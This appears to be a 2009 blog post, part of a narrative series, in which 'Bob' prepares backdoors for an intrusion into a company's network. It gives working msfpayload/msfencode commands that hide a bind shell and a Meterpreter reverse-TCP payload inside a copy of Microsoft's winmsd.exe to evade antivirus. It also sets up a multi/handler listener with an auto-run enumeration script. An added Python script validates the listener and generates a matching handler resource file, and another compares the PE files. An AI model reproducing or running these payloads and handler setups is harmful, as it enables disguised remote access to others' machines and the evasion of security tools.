Previously in Bob Land......
Bob hears on the grapevine that ncat won't work as a single executable. This is a bit of a bugger and it gives Bob a real problem: his intention was to use ncat for file transfers, proxies and backdoors, and it was also handy that it went pretty much undetected by AV.
Luckily for Bob, he hears from a good friend that it's quite possible to modify netcat so that it bypasses anti-virus software, and the most talented Muts has made a video that shows him exactly how to do that here.
This problem also presents Bob with the perfect opportunity to get his hands dirty with some msfpayload love. He reckons that if he creates a couple of payloads to add to his cab file he should be able to do everything he needs. And the beauty of using msfpayload is that he can pipe its output through msfencode, which at the time was enough to get past most signature-based anti-virus.
Before Bob creates his payloads he grabs a copy of winmsd.exe from his Windows OS. It doesn't really matter to him which file it is, he just wants one that is a Microsoft file. He wants this because his payloads can take on the characteristics of the template: its icon, its version information and its size. Rather than going to great lengths to hide a file, Bob's opinion is that hiding in plain sight will probably work better.
For Bob's first payload he wants a generic payload that spawns a command shell when he connects to it on port 6666.
./msfpayload windows/shell_bind_tcp LPORT=6666 R | ./msfencode -t exe -x /root/payloads/winmsd.exe -o /root/payloads/winmsd16.exe
Bob has specified a payload that binds a shell to port 6666. He outputs it in raw format (the R) and pipes it into msfencode, which encodes it and injects it into the winmsd.exe template to help it avoid detection by anti-virus software. Finally he has specified that the output file is called winmsd16.exe, and on casual inspection it looks just like the original winmsd.exe. Only the appearance is borrowed, though: the template's own code is replaced, so running winmsd16.exe starts the payload rather than the System Information tool.
After Bob creates the file he tests it on his XP VM to make sure it works as expected. A bind shell only works if the host firewall lets inbound connections to port 6666 through; the Windows Firewall, on by default since XP SP2, blocks them unless an exception is added.
Side by side it looks just like the original file: it is identical in size and appears to be a legitimate file from Microsoft. Its hash no longer matches the genuine winmsd.exe, so a file-integrity or catalog-signature check would still flag it.
Bob runs the file and checks that he can connect to it with netcat:
nc 10.0.1.10 6666
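Here is an added example (not from the original post and not Metasploit code) of the side-by-side check Bob does by eye, done on the file contents instead: it parses the PE headers of the template and of the built file and reports what actually differs. The two files it compares are tiny PE32 images constructed inside the script as stand-ins for winmsd.exe and winmsd16.exe; the script assumes nothing about how msfencode patches a real template, it only measures the result.

```python
"""Compare a template executable with the payload-bearing copy built from it.

Added example for this post, not Metasploit code. Reports size, entry point,
which section's bytes changed and how random the bytes at the new entry point
look. The sample files are hand-built PE32 images constructed below (not the
real winmsd.exe).
"""
import math
import struct

SECTION_HDR = "<8sIIIIIIHHI"        # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe(data: bytes) -> dict:
    """Entry RVA, image base and section table of a PE32/PE32+ file."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:                                   # PE32
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                                 # PE32+
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections = []
    for i in range(nsections):
        f = struct.unpack_from(SECTION_HDR, data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": f[1], "va": f[2], "rawsize": f[3], "rawptr": f[4]})
    return {"entry": entry, "image_base": image_base, "sections": sections}


def section_for_rva(pe: dict, rva: int):
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s
    return None


def entropy(buf: bytes) -> float:
    """Shannon entropy in bits per byte (8.0 = every byte value equally common)."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def entry_bytes(data: bytes, pe: dict, length: int = 256) -> bytes:
    """The first `length` raw bytes the loader will execute."""
    s = section_for_rva(pe, pe["entry"])
    if s is None:
        return b""
    off = s["rawptr"] + (pe["entry"] - s["va"])
    return data[off:off + length]


def compare(template: bytes, built: bytes) -> dict:
    """What changed between the template and the payload-bearing build."""
    a, b = parse_pe(template), parse_pe(built)
    changed = []                         # (section name, number of differing bytes)
    for s in b["sections"]:
        raw = slice(s["rawptr"], s["rawptr"] + s["rawsize"])
        n = sum(1 for x, y in zip(template[raw], built[raw]) if x != y)
        if n or len(template[raw]) != len(built[raw]):
            changed.append((s["name"], n))
    entry_sec = section_for_rva(b, b["entry"])
    return {
        "same_size": len(template) == len(built),
        "entry_rva": (a["entry"], b["entry"]),
        "entry_section": entry_sec["name"] if entry_sec else None,
        "changed_sections": changed,
        "entropy_at_entry": (round(entropy(entry_bytes(template, a)), 2),
                             round(entropy(entry_bytes(built, b)), 2)),
    }


# ---- constructed sample files (stand-ins, not real binaries) -----------------
TEMPLATE_TEXT = b"\x55\x8b\xec\x83\xec\x10\x33\xc0\x8b\xe5\x5d\xc3" + b"\xcc" * 0x1F4


def _sample_pe(text: bytes, entry_rva: int) -> bytes:
    """Hand-built PE32: .text at RVA 0x1000, .rsrc at 0x2000, 0x200-byte raw sections."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIIIIII", 0x10B, 0, 0, 0x200, 0x200, 0,
                      entry_rva, 0x1000, 0x2000, 0x400000)
    opt += b"\0" * (224 - len(opt))
    secs = struct.pack(SECTION_HDR, b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    secs += struct.pack(SECTION_HDR, b".rsrc", 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0x40000040)
    hdr = (dos + b"PE\0\0" + coff + opt + secs).ljust(0x200, b"\0")
    rsrc = b"icon/version-info stand-in".ljust(0x200, b"\0")   # left untouched by the "build"
    return hdr + text.ljust(0x200, b"\0") + rsrc


def sample_template() -> bytes:
    return _sample_pe(TEMPLATE_TEXT, 0x1000)


def sample_built() -> bytes:
    """Template with a 256-byte stand-in encoded stub written into .text at
    offset 0x80 and the entry point redirected to it; resources untouched."""
    blob = bytes((i * 37 + 11) & 0xFF for i in range(256))   # every byte value once: max entropy
    text = TEMPLATE_TEXT[:0x80] + blob + TEMPLATE_TEXT[0x80 + 256:]
    return _sample_pe(text, 0x1000 + 0x80)


if __name__ == "__main__":
    for k, v in compare(sample_template(), sample_built()).items():
        print(f"{k:18} {v}")
```

Run it against real files with compare(open(a, "rb").read(), open(b, "rb").read()). Equal size and an untouched resource section are what make the file look right in Explorer; a moved entry point that lands on a high-entropy region of .text is what a reviewer, or a heuristic AV engine, sees when it looks past the icon.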
Bob's second payload will connect back to him when he's on the wireless network and present him with a Meterpreter shell.
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.102 LPORT=8080 R | ./msfencode -t exe -x /root/payloads/winmsd.exe -o /root/payloads/winmsd32.exe
Again Bob uses a legitimate file to copy the characteristics from. This time, on his own host, he has to make sure his listener is ready on port 8080 before the payload runs.
Bob decides that he'll create his listener in msfconsole, selecting the generic handler first and then passing the following commands:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set LPORT 8080
set ExitOnSession false
set AutoRunScript winenum.rb
exploit -j -z
Bob has configured his listener to run as a background job that keeps accepting sessions (exploit -j -z together with ExitOnSession false), so multiple sessions can come back to him, and the very useful winenum script by Carlos "darkoperator" Perez will run against each connecting host. All the output from the script is stored under ~/.msf/logs/. One thing to check before relying on it: the handler's LHOST (192.168.1.101) is not the address the second payload was built with (LHOST=192.168.2.102); the handler must listen on the address the payload calls back to, or on 0.0.0.0, or the session never arrives. Bob may well decide to swap in a different script at a later date, but for now he's very happy.
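The listener only catches the session if it listens where the payload was told to call back. As an added example (not Metasploit code and not the author's), this script pulls PAYLOAD, LHOST and LPORT out of the msfpayload command line that built a payload, checks a listener's set lines against them, and writes a matching multi/handler resource script. It assumes the command-line form used in this post (payload name, KEY=VALUE options, then R) and the msfconsole option names used above; the build commands and listener settings are the ones from this post, copied in as sample input.

```python
"""Derive the multi/handler settings from the msfpayload build command and check
an existing listener against them.

Added example for this post, not part of Metasploit. Sample input below is the
post's own command lines and listener settings.
"""
import shlex

BUILD_CMDS = [
    "./msfpayload windows/shell_bind_tcp LPORT=6666 R | ./msfencode -t exe "
    "-x /root/payloads/winmsd.exe -o /root/payloads/winmsd16.exe",
    "./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.102 LPORT=8080 R | "
    "./msfencode -t exe -x /root/payloads/winmsd.exe -o /root/payloads/winmsd32.exe",
]

LISTENER = """\
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set LPORT 8080
set ExitOnSession false
set AutoRunScript winenum.rb
exploit -j -z
"""


def parse_build(cmd: str) -> dict:
    """Payload name, its options and the output file from a build pipeline."""
    stages = cmd.split("|")
    toks = shlex.split(stages[0])
    i = next(i for i, t in enumerate(toks) if t.endswith("msfpayload"))
    payload = toks[i + 1]
    opts = dict(t.split("=", 1) for t in toks[i + 2:] if "=" in t)
    enc = shlex.split(stages[1]) if len(stages) > 1 else []
    outfile = enc[enc.index("-o") + 1] if "-o" in enc else None
    return {"payload": payload, "opts": opts, "outfile": outfile}


def parse_listener(text: str) -> dict:
    """The 'set NAME VALUE' lines of an msfconsole session as a dict."""
    settings = {}
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[0] == "set":
            settings[parts[1]] = parts[2]
    return settings


def is_reverse(payload: str) -> bool:
    """Reverse payloads call back to LHOST:LPORT; bind payloads listen on the target."""
    return "reverse" in payload.rsplit("/", 1)[-1]


def check_listener(build: dict, listener: dict) -> list:
    """Problems that would stop this listener from catching this payload."""
    if not is_reverse(build["payload"]):
        return [f"{build['payload']} is a bind payload: no handler is needed, "
                f"connect to the target on port {build['opts'].get('LPORT')} instead"]
    problems = []
    if listener.get("PAYLOAD") != build["payload"]:
        problems.append(f"PAYLOAD {listener.get('PAYLOAD')} does not match {build['payload']}")
    want, got = build["opts"].get("LHOST"), listener.get("LHOST")
    if got not in (want, "0.0.0.0"):
        problems.append(f"LHOST {got} will never see a callback sent to {want} "
                        f"(use {want} or 0.0.0.0)")
    if listener.get("LPORT") != build["opts"].get("LPORT"):
        problems.append(f"LPORT {listener.get('LPORT')} does not match {build['opts'].get('LPORT')}")
    return problems


def handler_rc(build: dict, autorun: str = None, lhost: str = None) -> str:
    """msfconsole resource script for a multi/handler that matches a reverse payload.
    lhost overrides the build address (e.g. 0.0.0.0 to listen on every interface)."""
    if not is_reverse(build["payload"]):
        raise ValueError("bind payloads do not need a handler")
    lines = ["use exploit/multi/handler",
             f"set PAYLOAD {build['payload']}",
             f"set LHOST {lhost or build['opts']['LHOST']}",
             f"set LPORT {build['opts']['LPORT']}",
             "set ExitOnSession false"]
    if autorun:
        lines.append(f"set AutoRunScript {autorun}")
    lines.append("exploit -j -z")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    for cmd in BUILD_CMDS:
        b = parse_build(cmd)
        print(b["outfile"], "->", check_listener(b, parse_listener(LISTENER)) or "listener OK")
    print(handler_rc(parse_build(BUILD_CMDS[1]), autorun="winenum.rb"))
```

Save the generated script as handler.rc and start it with msfconsole -r handler.rc. Run against the settings in this post, the check reports the one thing that would have cost Bob his session: the listener's LHOST is 192.168.1.101 while winmsd32.exe was built to call 192.168.2.102.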
With his modified netcat and his payloads created and tested, Bob rebuilds his cab file and goes to get his dinner. He knows that during his network exploration adventures he may well run into problems that force him to create payloads on the fly, but he'll deal with that when it happens.
Whilst eating his dinner Bob begins to worry that if the admins at Walliford Fries patch the computers he may well lose his way in. By the time Bob has eaten his ice cream dessert he has come up with a few ideas for how he might overcome this particular problem.
Coming next....Backdoor Man - Part 2.
Tuesday, November 17, 2009